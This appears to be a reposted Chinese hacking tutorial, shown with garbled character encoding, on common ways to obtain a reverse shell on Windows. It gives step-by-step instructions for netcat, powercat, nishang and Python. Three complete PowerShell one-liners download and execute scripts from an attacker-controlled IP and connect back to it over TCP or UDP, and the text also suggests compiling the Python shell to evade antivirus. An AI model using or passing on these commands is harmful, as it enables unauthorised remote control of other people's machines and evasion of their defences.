零基礎(chǔ)學(xué)黑客,搜索公眾號(hào):白帽子左一
簡(jiǎn)介:shell類似于DOS下的COMMAND.COM和后來(lái)的cmd.exe,它接收用戶命令,然后調(diào)用相應(yīng)的應(yīng)用程序,也可以通俗的說(shuō)是命令執(zhí)行環(huán)境。分為交互式shell,與非交互式shell。
交互shell就是shell等待你的輸入,并且立即執(zhí)行你提交的命令,這種模式被稱作交互式是因?yàn)閟hell與用戶進(jìn)行交互。
非交互shell不會(huì)與用戶進(jìn)行交互,而是用戶讀取存放在文件中的命令或者輸入的命令,并且執(zhí)行它們。當(dāng)它讀到文件的結(jié)尾,shell也就終止了。
1.nc反彈shell
簡(jiǎn)介:nc是netcat的簡(jiǎn)寫,有著網(wǎng)絡(luò)界的瑞士軍刀美譽(yù)。因?yàn)樗绦【贰⒐δ軐?shí)用,被設(shè)計(jì)為一個(gè)簡(jiǎn)單、可靠的網(wǎng)絡(luò)工具
第一步:開(kāi)啟nc監(jiān)聽(tīng),這里我直接使用了Kali自帶的nc
第二步:在目標(biāo)服務(wù)器上使用nc工具,這個(gè)nc可以自己上傳
第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-661257.html
2.powershell反彈cmd
簡(jiǎn)介:powercat是netcat的powershell版本,下載地址:https://github.com/besimorhino/powercat ,由于這個(gè)地址默認(rèn)是被墻的,所以可以放在可被訪問(wèn)的遠(yuǎn)程服務(wù)器上。執(zhí)行命令的時(shí)候,自動(dòng)下載執(zhí)行。
第一步:攻擊者監(jiān)聽(tīng)
第二步:在webshell上執(zhí)行命令
powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.168.201.129/powercat.ps1‘); powercat -c 192.168.201.129 -p 9999 -e cmd
第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。
3.nishang反彈shell
簡(jiǎn)介:Nishang(https://github.com/samratashok/nishang )是一個(gè)基于PowerShell的攻擊框架,集合了一些 PowerShell攻擊腳本和有效載荷,可反彈TCP/ UDP/ HTTP/HTTPS/ ICMP等類型shell。
3.1)TCP反彈shell
第一步:攻擊者監(jiān)聽(tīng)
第二步:在目標(biāo)機(jī)器上執(zhí)行命令
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.201.129/Shells/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.201.129 -port 9999
第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。
3.2)UDP反彈shell
第一步:攻擊者監(jiān)聽(tīng)
第二步:在shell端執(zhí)行命令
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.201.129/Shells/Invoke-PowerShellUdp.ps1’);Invoke-PowerShellUdp -Reverse -IPAddress 192.168.201.129 -port 53
第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。
4.python反彈shell
簡(jiǎn)介:使用python編寫反彈shell,如果目標(biāo)支持python3可以腳本直接執(zhí)行即可,如果遇到殺軟可以使用生成exe的版本可以很好的逃逸殺軟。
第一步:攻擊者監(jiān)聽(tīng)
第二步:在shell端執(zhí)行命令
第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。
文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-661257.html
到了這里,關(guān)于Windows的幾種常用反彈shell方法的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!